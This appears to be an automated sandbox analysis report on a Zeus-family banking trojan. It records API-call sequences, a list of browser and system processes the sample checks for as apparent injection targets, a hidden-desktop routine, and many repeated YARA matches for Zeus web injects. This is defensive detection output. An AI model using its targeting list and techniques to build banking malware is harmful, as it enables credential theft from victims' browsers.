Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	8_2_012E37E0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	8_2_012E37E0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: GetCommandLineA,StrStrIA,memset,#680,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe	8_2_012F1660

Source: C:\Windows\apppatch\svchost.exe

Code function: 1_2_02D29360 CreateDesktopA,SetThreadDesktop,memset,SHGetFolderPathA,PathAppendA,CreateProcessA,GetShellWindow,GetShellWindow,Sleep,Sleep,GetShellWindow,GetHandleInformation,CloseHandle,GetHandleInformation,CloseHandle,GetDesktopWindow,FindWindowA,RegisterWindowMessageA,CreateThread,GetHandleInformation,CloseHandle,SetThreadDesktop,memset,SHGetFolderPathA,PathAppendA,CreateProcessA,GetShellWindow,GetShellWindow,Sleep,Sleep,GetShellWindow,GetHandleInformation,GetHandleInformation,CloseHandle,GetHandleInformation,CloseHandle,GetDesktopWindow,FindWindowA,CreateThread,GetHandleInformation,CloseHandle,SetEvent,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,

1_2_02D29360

Source: WerFault.exe

Process created: 42

System Summary

Malicious sample detected (through community Yara rule)

Source: 1.3.svchost.exe.39e0000.13.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 8.2.JbrLYfXaOpqnSngA.exe.12e0000.3.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.Bonelessness.exe.406400.0.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 8.2.JbrLYfXaOpqnSngA.exe.12e0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.25.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.26.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 6.2.JbrLYfXaOpqnSngA.exe.d52000.1.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.27.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 35.2.JbrLYfXaOpqnSngA.exe.3290000.3.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.36.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.42.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 31.2.JbrLYfXaOpqnSngA.exe.8b0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.3c60000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.34.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.2606000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.a00000.46.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 13.2.JbrLYfXaOpqnSngA.exe.a00000.1.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 21.2.JbrLYfXaOpqnSngA.exe.c22000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.23.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 23.2.JbrLYfXaOpqnSngA.exe.b92000.1.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.Bonelessness.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.15.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 29.2.JbrLYfXaOpqnSngA.exe.3012000.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.40.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.3c60000.4.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.37.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 16.2.JbrLYfXaOpqnSngA.exe.2fe0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.25.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.36.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 39.2.JbrLYfXaOpqnSngA.exe.2940000.3.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.28.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 33.2.JbrLYfXaOpqnSngA.exe.2b40000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.22.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 16.2.JbrLYfXaOpqnSngA.exe.2fe0000.3.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.3.Bonelessness.exe.86d460.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.2601000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 23.2.JbrLYfXaOpqnSngA.exe.b92000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 31.2.JbrLYfXaOpqnSngA.exe.852000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.20.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.2606c00.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.27.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.19.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.2570000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 31.2.JbrLYfXaOpqnSngA.exe.852000.1.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.31.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.38.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.3c60000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.3.Bonelessness.exe.868460.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 25.2.JbrLYfXaOpqnSngA.exe.2ab0000.3.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.13.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.29.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.23.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.2.svchost.exe.2d83c00.6.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.2.svchost.exe.24c2000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.22.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 37.2.JbrLYfXaOpqnSngA.exe.27f0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 16.2.JbrLYfXaOpqnSngA.exe.2e42000.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 16.2.JbrLYfXaOpqnSngA.exe.2e42000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 37.2.JbrLYfXaOpqnSngA.exe.27f0000.3.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 13.2.JbrLYfXaOpqnSngA.exe.a00000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.2.svchost.exe.2d83c00.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.24.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.29.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.3a80000.9.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.3.Bonelessness.exe.86d460.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.3c60000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.37.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.Bonelessness.exe.407000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.24.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.26.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.3.Bonelessness.exe.86e060.1.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.Bonelessness.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 39.2.JbrLYfXaOpqnSngA.exe.2940000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.2.svchost.exe.407000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 23.2.JbrLYfXaOpqnSngA.exe.c40000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 29.2.JbrLYfXaOpqnSngA.exe.3012000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 5.2.JbrLYfXaOpqnSngA.exe.e42000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 39.2.JbrLYfXaOpqnSngA.exe.e42000.1.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 37.2.JbrLYfXaOpqnSngA.exe.2652000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 33.2.JbrLYfXaOpqnSngA.exe.2962000.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.18.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 27.2.JbrLYfXaOpqnSngA.exe.2342000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 23.2.JbrLYfXaOpqnSngA.exe.c40000.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.Bonelessness.exe.406400.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 29.2.JbrLYfXaOpqnSngA.exe.32c0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.33.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 19.2.JbrLYfXaOpqnSngA.exe.2d82000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 13.2.JbrLYfXaOpqnSngA.exe.9a2000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.Bonelessness.exe.407000.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.17.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.44.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 31.2.JbrLYfXaOpqnSngA.exe.8b0000.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.2606000.1.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 39.2.JbrLYfXaOpqnSngA.exe.e42000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.34.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.21.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.2570000.3.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.3c60000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 27.2.JbrLYfXaOpqnSngA.exe.24e0000.3.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 19.2.JbrLYfXaOpqnSngA.exe.2f20000.3.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 6.2.JbrLYfXaOpqnSngA.exe.d52000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 37.2.JbrLYfXaOpqnSngA.exe.2652000.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.3c60000.5.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.44.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 5.2.JbrLYfXaOpqnSngA.exe.e42000.1.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 19.2.JbrLYfXaOpqnSngA.exe.2d82000.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.28.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.40.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 29.2.JbrLYfXaOpqnSngA.exe.32c0000.3.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 6.2.JbrLYfXaOpqnSngA.exe.2440000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.10.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 21.2.JbrLYfXaOpqnSngA.exe.2440000.3.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.41.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 27.2.JbrLYfXaOpqnSngA.exe.2342000.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 8.2.JbrLYfXaOpqnSngA.exe.1282000.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.38.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 5.2.JbrLYfXaOpqnSngA.exe.2890000.3.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.35.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 25.2.JbrLYfXaOpqnSngA.exe.1022000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 35.2.JbrLYfXaOpqnSngA.exe.2e92000.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.39.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.2606c00.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 33.2.JbrLYfXaOpqnSngA.exe.2962000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.3.Bonelessness.exe.868460.0.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.39.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.42.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.30.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 35.2.JbrLYfXaOpqnSngA.exe.2e92000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 25.2.JbrLYfXaOpqnSngA.exe.1022000.1.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.3c60000.8.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.32.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.a00000.45.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.3.Bonelessness.exe.86e060.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.3c60000.6.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.2.svchost.exe.407000.0.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.a00000.45.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
